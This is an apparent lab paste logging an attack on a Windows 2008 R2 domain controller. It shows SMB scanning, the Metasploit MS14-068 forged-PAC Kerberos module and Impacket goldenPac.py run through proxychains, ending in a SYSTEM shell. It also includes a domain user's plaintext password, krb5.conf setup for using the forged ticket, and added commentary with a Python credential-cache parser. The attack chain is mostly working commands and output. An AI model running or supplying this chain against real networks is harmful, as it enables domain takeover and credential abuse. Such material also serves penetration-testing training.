Untitled
a guest
Nov 9th, 2018
C:\Users\Admin\Desktop\Confidential data>type dns.contoso-west.org
type dns.contoso-west.org
> ls -d contoso-west.org

...
[dc2008r2-group1.contoso-west.org]
dc2008r2-group1 A 10.0.0.149
dcslave2008-group1 A 10.0.0.148
DomainDnsZones A 10.0.0.149
...


msf auxiliary(smb_version) > set RHOSTS 10.0.0.149
RHOSTS => 10.0.0.149
msf auxiliary(smb_version) > run

[+] 10.0.0.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:DC2008R2-GROUP1) (domain:CONTOSO-WEST)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
ProxyChains-3.1 (http://proxychains.sf.net)
Enter blot's password: Bl0tt12309-
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
net rpc> user
net rpc user> show
Usage: net rpc user show <username>
net rpc user show failed: NT_STATUS_INVALID_PARAMETER
net rpc user> show blot
user rid: 1109, group rid: 513
net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe


auxiliary/admin/kerberos/ms14_068_kerberos_checksum


msf auxiliary(ms14_068_kerberos_checksum) > show info

Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-11-18

Provided by:
Tom Maddock
Sylvain Monne
juan vazquez <juan.vazquez@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD                   yes       The Domain User password
RHOST                      yes       The target address
RPORT     88               yes       The target port
Timeout   10               yes       The TCP timeout to establish connection and read data
USER                       yes       The Domain User
USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Description:
This module exploits a vulnerability in the Microsoft Kerberos
implementation. The problem exists in the verification of the
Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
where a domain user may forge a PAC with arbitrary privileges,
including Domain Administrator. This module requests a TGT ticket
with a forged PAC and exports it to a MIT Kerberos Credential Cache
file. It can be loaded on Windows systems with the Mimikatz help. It
has been tested successfully on Windows 2008.

References:
https://cvedetails.com/cve/CVE-2014-6324/
https://technet.microsoft.com/en-us/library/security/MS14-068
OSVDB (114751)
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
https://github.com/bidord/pykek
https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit


msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
DOMAIN => contoso-west.org
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
RHOST => 10.0.0.149
msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
USER => blot
msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

Name      Current Setting                                 Required  Description
----      ---------------                                 --------  -----------
DOMAIN    contoso-west.org                                yes       The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD  Bl0tt12309-                                     yes       The Domain User password
RHOST     10.0.0.149                                      yes       The target address
RPORT     88                                              yes       The target port
Timeout   10                                              yes       The TCP timeout to establish connection and read data
USER      blot                                            yes       The Domain User
USER_SID  S-1-5-21-3039018489-1111549232-2925702125-1109  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000


msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain CONTOSO-WEST.ORG...
[*] 10.0.0.149:88 - Sending AS-REQ...
[*] 10.0.0.149:88 - Parsing AS-REP...
[*] 10.0.0.149:88 - Sending TGS-REQ...
[+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
[+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
[*] Auxiliary module execution completed

root@10-kali2-group10:~/.msf4/loot# ls
20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
root@10-kali2-group10:~/.msf4/loot#


To use this ticket, which is in MIT Credential Cache (ccache) format, the MIT Kerberos tools (klist, kinit, smbclient -k) have to be pointed at it. They read the cache named by $KRB5CCNAME and otherwise fall back to /tmp/krb5cc_<uid> (/tmp/krb5cc_0 for root), so after moving the file as below either rename it to that path or set KRB5CCNAME=/tmp/krb5cc in the shell; klist -c /tmp/krb5cc then shows what the cache holds. Note that goldenPac.py, used further down, does not read this cache at all: it performs the Kerberos exchange itself.

root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc


Modified /etc/krb5.conf (with nano) and added the realm and domain-to-realm mapping. Realm names are case-sensitive and conventionally upper case, and the [domain_realm] keys must be the DNS domain, not the NetBIOS name, so the full names are used throughout:
[libdefaults]
default_realm = CONTOSO-WEST.ORG
[realms]
CONTOSO-WEST.ORG = {
# use the IP (10.0.0.149) instead if the DC name does not resolve from the attack host
kdc = dc2008r2-group1.contoso-west.org
admin_server = dc2008r2-group1.contoso-west.org
default_domain = contoso-west.org
}
[domain_realm]
.contoso-west.org = CONTOSO-WEST.ORG
contoso-west.org = CONTOSO-WEST.ORG


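Before pointing krb5.conf at the loot file or loading it on a host it is worth checking what the cache actually contains: the client principal, the service (krbtgt/REALM for a TGT), the session-key type, the validity window and the ticket flags. The Python below is an added example for this walkthrough, not code from the paste, Metasploit or Impacket. It parses the ccache version-4 layout that Metasploit and kinit write; since the real loot file is not available here, it also builds a constructed stand-in in memory using the realm and user from the walkthrough (placeholder ticket bytes, not a real TGT). The `is_usable` check, the `Reader`/`Writer` helpers and the sample timestamps are the example's own assumptions.

```python
"""Inspect an MIT Kerberos credential cache (ccache, format version 4), such as
the .bin file ms14_068_kerberos_checksum leaves under ~/.msf4/loot.
Added example for this walkthrough; not code from the paste, Metasploit or
Impacket. The ccache is constructed in memory as a stand-in for the loot file
so this runs offline; its ticket bytes are a placeholder, not a real TGT.
"""
import struct
from datetime import datetime, timezone

# Ticket flag bits as stored in the ccache uint32 (MIT krb5 TKT_FLG_* values).
TKT_FLAGS = {
    0x40000000: "forwardable", 0x20000000: "forwarded", 0x10000000: "proxiable",
    0x08000000: "proxy", 0x04000000: "may_postdate", 0x02000000: "postdated",
    0x01000000: "invalid", 0x00800000: "renewable", 0x00400000: "initial",
    0x00200000: "pre_authent", 0x00100000: "hw_authent",
}

class Reader:                      # big-endian cursor (ccache v3/v4 are big-endian)
    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache at offset %d" % self.pos)
        self.pos += n
        return chunk

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def octets(self): return self.take(self.u32())       # counted octet string

    def principal(self):
        self.u32()                                        # name type, not needed here
        ncomp = self.u32()
        realm = self.octets().decode()
        return "/".join(self.octets().decode() for _ in range(ncomp)) + "@" + realm

def parse_ccache(data):
    r = Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled")
    r.take(r.u16())                          # v4 header (tagged fields), skipped
    cache = {"default_principal": r.principal(), "credentials": []}
    while r.pos < len(r.data):               # credential records run to end of file
        cred = {"client": r.principal(), "server": r.principal()}
        cred["keytype"] = r.u16()            # 23 = RC4-HMAC, 18 = AES256-CTS
        cred["key"] = r.octets()
        for name in ("authtime", "starttime", "endtime", "renew_till"):
            cred[name] = datetime.fromtimestamp(r.u32(), timezone.utc)
        r.u8()                               # is_skey
        bits = r.u32()
        cred["flags"] = [n for b, n in TKT_FLAGS.items() if bits & b]
        for _ in range(r.u32()):             # addresses: addrtype + data
            r.u16(); r.octets()
        for _ in range(r.u32()):             # authorization data: adtype + data
            r.u16(); r.octets()
        cred["ticket"] = r.octets()          # DER-encoded Ticket
        r.octets()                           # second_ticket
        cache["credentials"].append(cred)
    return cache

def is_usable(cred, now):
    """True if `now` lies in the ticket's validity window and it is not flagged invalid."""
    return cred["starttime"] <= now < cred["endtime"] and "invalid" not in cred["flags"]

class Writer:                      # just enough to build the constructed sample
    def __init__(self): self.buf = bytearray()
    def u16(self, v): self.buf += struct.pack(">H", v)
    def u32(self, v): self.buf += struct.pack(">I", v)
    def octets(self, b): self.u32(len(b)); self.buf += b

    def principal(self, name):
        comps, realm = name.rsplit("@", 1)
        comps = comps.split("/")
        self.u32(1); self.u32(len(comps)); self.octets(realm.encode())   # NT-PRINCIPAL
        for c in comps:
            self.octets(c.encode())

def build_sample_ccache():
    """Constructed stand-in for the loot file: one TGT for blot@CONTOSO-WEST.ORG."""
    w = Writer()
    w.buf += b"\x05\x04"
    w.u16(12); w.u16(1); w.u16(8); w.buf += bytes(8)          # header: DeltaTime tag
    w.principal("blot@CONTOSO-WEST.ORG")                      # default principal
    w.principal("blot@CONTOSO-WEST.ORG")                      # credential: client
    w.principal("krbtgt/CONTOSO-WEST.ORG@CONTOSO-WEST.ORG")   # credential: server
    w.u16(23); w.octets(bytes(16))                            # RC4-HMAC session key (dummy)
    start = 1541797200                                        # 2018-11-09 21:00:00 UTC
    for t in (start, start, start + 10 * 3600, start + 7 * 86400):
        w.u32(t)                                              # auth, start, end, renew_till
    w.buf += b"\x00"                                          # is_skey
    w.u32(0x40000000 | 0x00800000 | 0x00400000 | 0x00200000)  # forwardable|renewable|initial|pre_authent
    w.u32(0); w.u32(0)                                        # no addresses, no authdata
    w.octets(b"\x61\x00")                                     # placeholder for the DER Ticket
    w.octets(b"")                                             # no second ticket
    return bytes(w.buf)

if __name__ == "__main__":
    for c in parse_ccache(build_sample_ccache())["credentials"]:
        print(c["client"], "->", c["server"], "etype", c["keytype"], c["endtime"], c["flags"])
```

For the real loot file, call parse_ccache(open("/tmp/krb5cc", "rb").read()); once krb5.conf is in place, klist -c /tmp/krb5cc shows the same fields. An endtime already in the past, or a client realm that differs from the realm configured in krb5.conf, are the first things to rule out if the MIT tools later refuse the ticket.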
Impacket's goldenPac.py does the same MS14-068 exchange end to end on its own: it looks up the user's SID over SAMR (the 445 hops below), requests the forged-PAC TGT and a service ticket from the KDC (the 88 hops), then uses the ticket for a psexec-style service on the DC, so it needs neither the Metasploit ccache nor krb5.conf. The "Couldn't get forest info" line is proxychains' resolver failing to look up contoso-west.org via 4.2.2.2; the forest lookup is optional and the tool continues against the -dc-ip given:

proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

Password:Bl0tt12309-
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
|DNS-request| contoso-west.org
|S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: contoso-west.org does not exist
[-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
[*] Attacking domain controller 10.0.0.149
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
[*] 10.0.0.149 found vulnerable!
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[*] Requesting shares on 10.0.0.149.....
[*] Found writable share ADMIN$
[*] Uploading file UApVHfro.exe
[*] Opening SVCManager on 10.0.0.149.....
[*] Creating service TGOJ on 10.0.0.149.....
[*] Starting service TGOJ.....
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[!] Press help for extra shell commands
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.0.0.149
Subnet Mask . . . . . . . . . . . : 255.255.255.240
Default Gateway . . . . . . . . . : 10.0.0.145

Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

C:\Windows\system32>